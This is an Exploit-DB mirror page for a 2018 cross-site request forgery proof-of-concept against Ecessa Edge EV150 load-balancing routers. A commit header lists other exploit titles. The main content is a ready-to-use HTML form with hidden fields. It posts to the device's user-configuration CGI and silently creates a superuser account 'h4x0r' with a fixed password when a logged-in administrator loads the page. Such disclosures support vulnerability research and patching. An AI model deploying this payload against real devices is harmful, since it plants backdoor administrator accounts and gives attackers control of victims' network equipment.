bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/webapps/44932.txt
Offensive Security d8206fb5eb DB: 2018-06-26 
13 changes to exploits/shellcodes

KVM (Nested Virtualization) - L1 Guest Privilege Escalation

DIGISOL DG-BR4000NG - Buffer Overflow (PoC)

Foxit Reader 9.0.1.1049 - Remote Code Execution

WordPress Plugin iThemes Security < 7.0.3 - SQL Injection

phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)

phpMyAdmin 4.8.1 - Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection
Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
DIGISOL DG-BR4000NG - Cross-Site Scripting
Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Arbitrary File Upload
WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection
2018-06-26 05:01:46 +00:00

49 lines
No EOL
2.5 KiB
Text
Raw Blame History

# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Author: LiquidWorm
# Date: 2018-05-21
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
# Tested on: lighttpd/1.4.35
# Summary: Internet Failover and Load Balancing for Small Businesses, Stores
# and Branch Offices.
# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.
<html>
<body>
<form action="https://Target/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink